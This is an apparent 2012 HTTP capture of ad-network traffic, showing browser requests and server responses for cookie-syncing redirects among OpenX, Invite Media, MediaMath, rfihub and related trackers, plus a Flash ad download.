GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4 HTTP/1.1

Host: r.openx.net
GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&amp;rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:45 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /openx_sync?id=2ef47344-c41b-4b53-95d9-8928a7d29b7b HTTP/1.1

Host: openx.px.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 16 Nov 2012 20:24:45 GMT
Set-Cookie: exchange_uid=eyIxMCI6WyIyZWY0NzM0NC1jNDFiLTRiNTMtOTVkOS04OTI4YTdkMjliN2IiLDczNDgyM119;Path=/;Domain=invitemedia.com;Expires=Sat, 16-Nov-2013 20:24:45 GMT uid=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0;Path=/;Domain=invitemedia.com;Expires=Sat, 16-Nov-2013 20:24:45 GMT impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://r.openx.net/set?pid=7714c60d-5115-40aa-881b-4387c99badbf&amp;rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /set?pid=7714c60d-5115-40aa-881b-4387c99badbf&rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0 HTTP/1.1

Host: r.openx.net
GET /set?pid=7714c60d-5115-40aa-881b-4387c99badbf&amp;rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:45 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /w/1.0/pd?plm=2 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309041
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_pd=5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485; Version=1; Expires=Sat, 01-Dec-2012 20:24:45 GMT; Max-Age=1296000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 333
Connection: close
GET /sync/img?mt_exid=5&redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=5&amp;redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: uuid=50a6a10d-3cec-2511-51c1-49fbbef97cf4; mt_mop=5:1353097485
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x108b 4235
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=5:1353097485; domain=.mathtag.com; path=/; expires=Sun, 16-Dec-2012 20:24:45 GMT
Location: http://r.openx.net/set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&amp;rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4
GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4 HTTP/1.1

Host: r.openx.net
GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&amp;rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:45 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /w/1.0/jstag HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Fri, 16 Nov 2012 21:24:44 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 28208
Cache-Control: max-age=3600
Connection: close
GET /openx_sync?id=2ef47344-c41b-4b53-95d9-8928a7d29b7b HTTP/1.1

Host: openx.px.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: exchange_uid=eyIxMCI6WyIyZWY0NzM0NC1jNDFiLTRiNTMtOTVkOS04OTI4YTdkMjliN2IiLDczNDgyM119; uid=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 16 Nov 2012 20:24:45 GMT
Set-Cookie: exchange_uid=eyIxMCI6WyIyZWY0NzM0NC1jNDFiLTRiNTMtOTVkOS04OTI4YTdkMjliN2IiLDczNDgyM119;Path=/;Domain=invitemedia.com;Expires=Sat, 16-Nov-2013 20:24:45 GMT impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://r.openx.net/set?pid=7714c60d-5115-40aa-881b-4387c99badbf&amp;rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /w/1.0/pd?plm=2 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; OX_pd=5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_pd=66482baa-af6b-11e1-8f8e-842b2b080a35.1353097485|d095054c-b000-11e1-8f8e-842b2b080a35.1353097485|5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485; Version=1; Expires=Sat, 01-Dec-2012 20:24:45 GMT; Max-Age=1296000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 176
Connection: close
GET /a97/a97ba73a-af44-466a-86ba-8c74a601bd81/2c3/2c36f11fa6f94fa59fce32ba8be8af92.swf HTTP/1.1

Host: ox-socialimg.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 25 Oct 2012 22:10:40 GMT
Etag: &quot;6b1f28-c402-4cce97937f800&quot;
Accept-Ranges: bytes
Content-Length: 50178
Date: Fri, 16 Nov 2012 20:24:46 GMT
Connection: keep-alive
GET /set?pid=7714c60d-5115-40aa-881b-4387c99badbf&rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0 HTTP/1.1

Host: r.openx.net
GET /set?pid=7714c60d-5115-40aa-881b-4387c99badbf&amp;rtb=f410e67f-e6b9-4ba2-9e02-8cdd9cf9c9e0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:46 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /cm?in=1&pub=25 HTTP/1.1

Host: p.rfihub.com
GET /cm?in=1&amp;pub=25 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Found

HTTP/1.1 302 Found
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s5=1353097486196;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT u=&quot;aAB1cXwCw==AI3oyfww==AAABOwrlH3Q=&quot;;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT e=cr;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT a=c638666723858495012;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT j=c638666723858495012;Path=/;Domain=.rfihub.com r=1353097486196;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT o=1-mKNuNWJ8AW_A;Path=/;Domain=.rfihub.com;Expires=Tue, 05-May-15 20:24:46 GMT p=1-mKNuNWJ8AW_A;Path=/;Domain=.rfihub.com
Location: http://r.openx.net/set?pid=2076250f-92c2-4ecd-9043-cc63ee6c4577&amp;rtb=638666723858495012
Content-Length: 0
GET /set?pid=2076250f-92c2-4ecd-9043-cc63ee6c4577&rtb=638666723858495012 HTTP/1.1

Host: r.openx.net
GET /set?pid=2076250f-92c2-4ecd-9043-cc63ee6c4577&amp;rtb=638666723858495012 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:46 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /r/dm/mkt/4/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3592403702218291627 HTTP/1.1

Host: d.p-td.com
GET /r/dm/mkt/4/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4482338422620735162; Domain=.p-td.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:45 GMT
GET /r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3592403702218291627 HTTP/1.1

Host: d.audienceiq.com
GET /r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3998963901926003638; Domain=.audienceiq.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:46 GMT
GET /r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3592403702218291627 HTTP/1.1

Host: d.audienceiq.com
GET /r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: uid=3998963901926003638
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3998963901926003638; Domain=.audienceiq.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/
Location: http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:46 GMT
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3592403702218291627 HTTP/1.1

Host: r.openx.net
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:46 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0N3xsdz0xNDQxfGFpZD02NjExNTB8cHViPTY3ODU0fGxpZD0zNDczMzh8dD0yfHJpZD1lY2YwZWYxOC00OGI2LTRmM2EtODE0OS05M2MxMWYxNTRjMzB8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTY1MDAwMHxhYz1VU0R8cG09UFJJQ0lORy5DUEF8bGM9MnxydD0xMzUzMDk3NDg0fHByPTY1MDAwMHxhZHY9NjI5Nzc&cb=84029190 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0N3xsdz0xNDQxfGFpZD02NjExNTB8cHViPTY3ODU0fGxpZD0zNDczMzh8dD0yfHJpZD1lY2YwZWYxOC00OGI2LTRmM2EtODE0OS05M2MxMWYxNTRjMzB8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTY1MDAwMHxhYz1VU0R8cG09UFJJQ0lORy5DUEF8bGM9MnxydD0xMzUzMDk3NDg0fHByPTY1MDAwMHxhZHY9NjI5Nzc&amp;cb=84029190 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; OX_pd=5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485
HTTP/1.1 200 OK

Content-Type: image/gif
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:46 GMT
Content-Length: 43
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /w/1.0/pd?plm=2 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE
